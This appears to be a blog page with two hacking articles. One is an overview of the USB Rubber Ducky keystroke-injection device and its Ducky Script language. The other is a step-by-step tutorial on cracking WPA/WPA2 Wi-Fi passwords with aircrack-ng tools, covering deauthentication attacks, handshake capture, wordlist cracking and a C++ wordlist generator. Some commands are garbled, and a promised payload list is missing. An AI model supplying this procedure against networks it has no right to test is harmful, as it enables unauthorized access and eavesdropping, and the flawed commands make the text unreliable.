Pranav Anyapu

USB Rubber Ducky :

The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. Computers recognize it as a regular keyboard and automatically accept its pre-programmed keystroke payloads at over 1000 words per minute.

ABOUT :

It was developed by the Hak5 community after the success of the USB Switchblade, where the attack platform that was super effective against local Windows targets from USB Switchblade. The USB Rubber Ducky works on cross-platform (Windows, Mac, Linux) which achieves deadly results by posing as a ubiquitous keyboard.

The USB Rubber Ducky isn't the ordinary HID (Human Interface Device). Coupled with a powerful 60 MHz 32-bit processor and a simple scripting language anyone is able to craft payloads capable of changing system settings, opening backdoors, retrieving data, initiating reverse shells, or basically anything that can be achieved with physical access which are all automated and executed in a matter of seconds.

The first ever USB Rubber Ducky was invented by Hak5 founder Darren Kitchen while working in systems administration. He was tired of typing the same commands to fix printers and network shares again and again, the device evolved out of laziness. Kitchen programmed a development board to emulate the typing for him, and thus the keystroke injection attack was born. Since 2010 the USB Rubber Ducky has been a favourite among hackers, pentesters and IT pros. With its debut, keystroke injection attacks were invented and since it has captured the imagination with its simple scripting language, formidable hardware, and covert design.

Key features :

Cross-Platform: Attacks any OS that supports USB Keyboards
Simple Scripting language: Start writing payloads in minutes
Open Source Firmware: Add functionality using included libraries
Expandable Storage: Micro SD cards make it possible to carry multiple payloads
Community Support: Share sample scripts, complete payloads and get help online

Working of a USB Rubber Ducky :

When a USB device is connected to a system the system will query the device to determine its use and device type. The device type allows the system to load the appropriate driver so the USB device can be used on the system. For example, a WiFi adapter can be inserted into a system. The system queries the device and finds it is a specific model of a RealTek Wi-Fi adapter. The system will the load the appropriate driver for the device and start it, if possible. Once started the system will attempt to use the Wi-Fi adapter to connect to a network. If needed, a configuration window may appear to help configure the device properly as needed.

Most USB devices are automatically detected and used by the system, such as keyboards. A keyboard is seen by a system as sending input to the system which the system will accept. The USB Rubber Ducky will be seen as a keyboard device. Because of the device type most systems will start accepting data from the keyboard.

Scripts can be created and placed on the USB Rubber Ducky memory to allow them to be pushed into the system. These scripts can be used to gain a lot of information from the system in which the USB Rubber Ducky is inserted.

Because of the widespread use and acceptance of USB devices the Rubber Ducky works on all devices which support USB Keyboard interface.

Ducky Script :

Ducky Script is the language of the USB Rubber Ducky. Writing scripts for can be done from any common ASCII text editor such as Notepad, VI, emacs, Nano, gedit, kedit, TextEdit, etc. The Ducky Script language is a very straight forward language. The language is based off of keystrokes to act as a keyboard.

Syntax :

Ducky Script syntax is simple. Each command resides on a new line and may have options follow. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key-combos or strings of text, while some offer delays or pauses.

The commands are as follows:

DEFAULT_DELAY ### - sets a default delay in milliseconds to occur between each command within the whole script. Delays are necessary to allow windows to open, characters to be sent to the system, etc.
DELAY ### - sets a default delay in milliseconds to occur when the command is given. The Rubber Ducky can send around 16 keystrokes a second to the system.
GUI x – the command is the same as pressing the Window key. An additional key is also pressed to perform a certain task in Windows or other Operating System (OS). For example, the Window key and 'r' opens a run command window. You can also use the command WINDOW.
STRING xxxx – sends the string of characters to the system.
MENU or APP – performs the same action as a right-click.
REPLAY x – cause the last command to be repeated x number of times.
Key presses to the system (these are the same as pressing the designated key)

BREAK
PAUSE
CTRL
ALT
BREAK
CAPSLOCK
DELETE
END
ESC (ESCAPE)
HOME
INSERT
NUMLOCK
PAGEUP
PAGEDOWN
PRINTSCREEN
SCROLLLOCK
SPACE
TAB
F1..F12
UP (UPARROW)
DOWN (DOWNARROW)
LEFT (LEFTARROW)
RIGHT (RIGHTARROW)

The USB Rubber Ducky sends data to the system as hex just as a keyboard. To convert the text file to hex you use 'duckencoder'.

Compiling a Ducky script :

Ducky Scripts are compiled into hex files ready to be named inject.bin and moved to the root of a micro SD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder.

Duckencoder is a cross-platform command-line Java program which converts the Ducky Script syntax into hex files. Usage is:

As of duckencoder 1.X usage is:

Usage: duckencode -i [file ..] Encode specified file

Or: duckencode -i [file ..] -o [file ..] encode to specified file

For example on a Linux system:

java -jar duckencoder.jar -i exploit.txt -o /media/microsdcard/inject.bin

Payloads :

In the context of a cyber-attack, a payload is the component of the attack which causes harm to the victim. Malicious payloads can sit dormant on a computer or network for seconds or even months until triggered. These malicious payloads are the parts of cyber-attacks.

Some payloads which are developed by hak5 are:

Hardware Owerview :

Atmel 32bit AVR Microcontroller AT32UC3B1256
MicroSD card reader
Micro push-button
Multi-color LED indicator
JTAG Interface (can be used for I/O)
Standard “Type A” USB connector

Atmel AT32UC3B1256 Features :

High Performance, Low Power AVR 32 UC 32-Bit Microcontroller
Compact Single-cycle RISC Instruction Set Including DSP Instruction Set
Read-Modify-Write Instructions and Atomic Bit Manipulation
Performing up to 1.39 DMIPS / MHz
Up to 83 DMIPS Running at 60 MHz from Flash
Up to 46 DMIPS Running at 30 MHz from Flash
Memory Protection Unit
Multi-hierarchy Bus System
High-Performance Data Transfers on Separate Buses for Increased Performance
7 Peripheral DMA Channels Improves Speed for Peripheral Communication
Internal High-Speed Flash
512K Bytes, 256K Bytes, 128K Bytes, 64K Bytes Versions
Single Cycle Access up to 30 MHz
Prefetch Buffer Optimizing Instruction Execution at Maximum Speed
4ms Page Programming Time and 8ms Full-Chip Erase Time
100,000 Write Cycles, 15-year Data Retention Capability
Flash Security Locks and User Defined Configuration Area
Internal High-Speed SRAM, Single-Cycle Access at Full Speed
96K Bytes (512KB Flash), 32K Bytes (256KB and 128KB Flash), 16K Bytes (64KB Flash)
Interrupt Controller
Autovectored Low Latency Interrupt Service with Programmable Priority
System Functions
Power and Clock Manager Including Internal RC Clock and One 32KHz Oscillator
Two Multipurpose Oscillators and Two Phase-Lock-Loop (PLL) allowing Independant CPU Frequency from USB Frequency
Watchdog Timer, Real-Time Clock Timer
Universal Serial Bus (USB)
Device 2.0 and Embedded Host Low Speed and Full Speed
Flexible End-Point Configuration and Management with Dedicated DMA Channels
On-chip Transceivers Including Pull-Ups
USB Wake Up from Sleep Functionality
One Three-Channel 16-bit Timer/Counter (TC)
Three External Clock Inputs, PWM, Capture and Various Counting Capabilities
One 7-Channel 20-bit Pulse Width Modulation Controller (PWM)
Three Universal Synchronous/Asynchronous Receiver/Transmitters (USART)
Independant Baudrate Generator, Support for SPI, IrDA and ISO7816 interfaces
Support for Hardware Handshaking, RS485 Interfaces and Modem Line
One Master/Slave Serial Peripheral Interfaces (SPI) with Chip Select Signals
One Synchronous Serial Protocol Controller
Supports I2S and Generic Frame-Based Protocols
One Master/Slave Two-Wire Interface (TWI), 400kbit/s I2C-compatible
One 8-channel 10-bit Analog-To-Digital Converter, 384ks/s
16-bit Stereo Audio Bitstream DAC
Sample Rate Up to 50 KHz
QTouch Library Support
Capacitive Touch Buttons, Sliders, and Wheels
QTouch and QMatrix Acquisition

USB Rubber Ducky purchase :

The USB Rubber Ducky can be purchased at https://hakshop.com/products/usb-rubber-ducky-deluxe

The cost of USB Rubber Ducky was around $50 USD.

References:

The information in this article is taken from the github.com from hack5darren profile.You can visit the real article in github from this link.

· https://github.com/hak5darren/USB-Rubber-Ducky/wiki

Before going to discuss about this topic I want to make sure that I am not promoting any sort of illegal hacking. This article or Tutorial is only written and published in the interest of bring awareness in people that , it’s how easy to hack into a WPA/WPA-2 wi-fi network.

Warning: Hacking into others wi-fi networks and stealing their data is a serious offence. There will be serious actions taken if you get caught. I never promote illegal hacking.

While discussing about WPA/WPA-2 PSK wi-fi networks, WPA stands for wireless protected access and WPA-2 stands for wireless protected access-2 and PSK stands for pre-shared key.

The password length of a WPA/WPA-2 PSK wi-fi network is between 8 to 63 long.

Before hacking into a WPA/WPA-2 PSK wi-fi network we need to know how actually this network works. When a user is trying to connect to this type of network , he/she needs to enter a correct password which was assigned to the specific network ssid which he/she wants to connect. The password which is entered in the users device is sent to the wi-fi network router, this transfer is carried out via air with 802.11b protocol. The data which contains the password is sent to the router in the form of packets. When the password is received at the router the router checks the password which was sent by the user who is trying to connect to this network will be compared and checked with original password which is assigned to that network ssid. If the password matches then user can connect into the network and if the password dosen’t matches the connection is terminated. So we do know that the client/device which is trying to connect to the wi-fi network sends the password in encrypted packets of data. Here we are going to intercept the connection and capture the encrypted password so that we can decrypt it using a word list.

A word list consists of all possible combinations of strings (alphabetical, alphanumerical, numerical, etc) of length 8 to 63 characters long.

In this tutorial I am using Airmon-ng tool in Kali Linux operating system to explain how anyone can hack a WPA/WPA-2 wi-fi network.

STEP 1

Open terminal in Kali Linux and enter the following command.

root@kali:~ # airmon-ng check kill

This command kills the ongoing Wi-Fi processes.

STEP 2

Now we have to scan the all available wi-fi networks until we find our targeted wi-fi network.

root@kali:~ # airodump-ng <network interface name>

By the above command we can scan and find the targeted wi-fi network within the range.After finding the target network, to terminate scanning press key ctrl+c

The network interface name is the wireless card name if there is 1 wireless card attached to computer then the name of the card is wlan0.

STEP 3

Once you find the target network all we need to do is attack it.

root@kali:~ # airodump-ng -c <channel> -w <file name to save> --bssid <BSSID> <network interface name>

The above command will be taking the handshake file and save it in .cap format. It means the encrypted password from the user which is send to router is being captured and saved in a file for the decryption of password.

STEP 4

Open a new terminal window and enter the following command.

root@kali:~ # aireplay-ng -o o -a <bssid> <network interface name>

The above command is to create a wi-fi de-authentication attack in-order to intercept the encrypted the password from the connected clients. The above command disconnects the all connected devices/clients from the targeted network so they tend to reconnect to the network.

Deactivate the de-authentication attack we see a WPA handshake:<bssid> on the previous terminal where we performed the capturing of handshake file.

press key ctrl+c to de-activate the de-authentication attack.

We have successful captured the encrypted password but we need to decrypt the password.

STEP 5

Scroll down to check about word list.

root@kali:~ # aircrack-ng -w <directory of word list> <file generated during handshake with extension.cap

This command will check all the strings in the word list with the handshake file and if found it will show the password.

This is how we can hack a WPA/WPA-2 wi-fi networks using Airmon-ng tool in Kali Linux operating system.

I prepared a word list but I cannot upload the files, so I wrote a code to generate the word list so you can run the code on your pc to obtain the word list or you can download the word list from internet or any other websites.

Code to generate a 8-digit word list:

#include <bits/stdc++.h>
using namespace std;

int main(){
ofstream out;
out.open("craker.txt");
int count = 10;
for (unsigned int i = 0; i < count; i += 1)
for (unsigned int j = 0; j < count; j += 1)
for (unsigned int k = 0; k < count; k += 1)
for (unsigned int m = 0; m < count; m += 1)
for (unsigned int n = 0; n < count; n += 1)
for (unsigned int v = 0; v < count; v += 1)
for (unsigned int t = 0; t < count; t += 1)
for (unsigned int r = 0; r < count; r += 1)
out<<i<<j<<k<<m<<n<<v<<t<<r<<endl;
out.close();
return 0;
}

If you have any doubts regarding this tutorial drop them in the comments section below and I will get through them.

If you face any difficulty while going through this tutorial I made a video tutorial so that you can watch it from the link bellow:

https://youtu.be/00EhvJM0sjo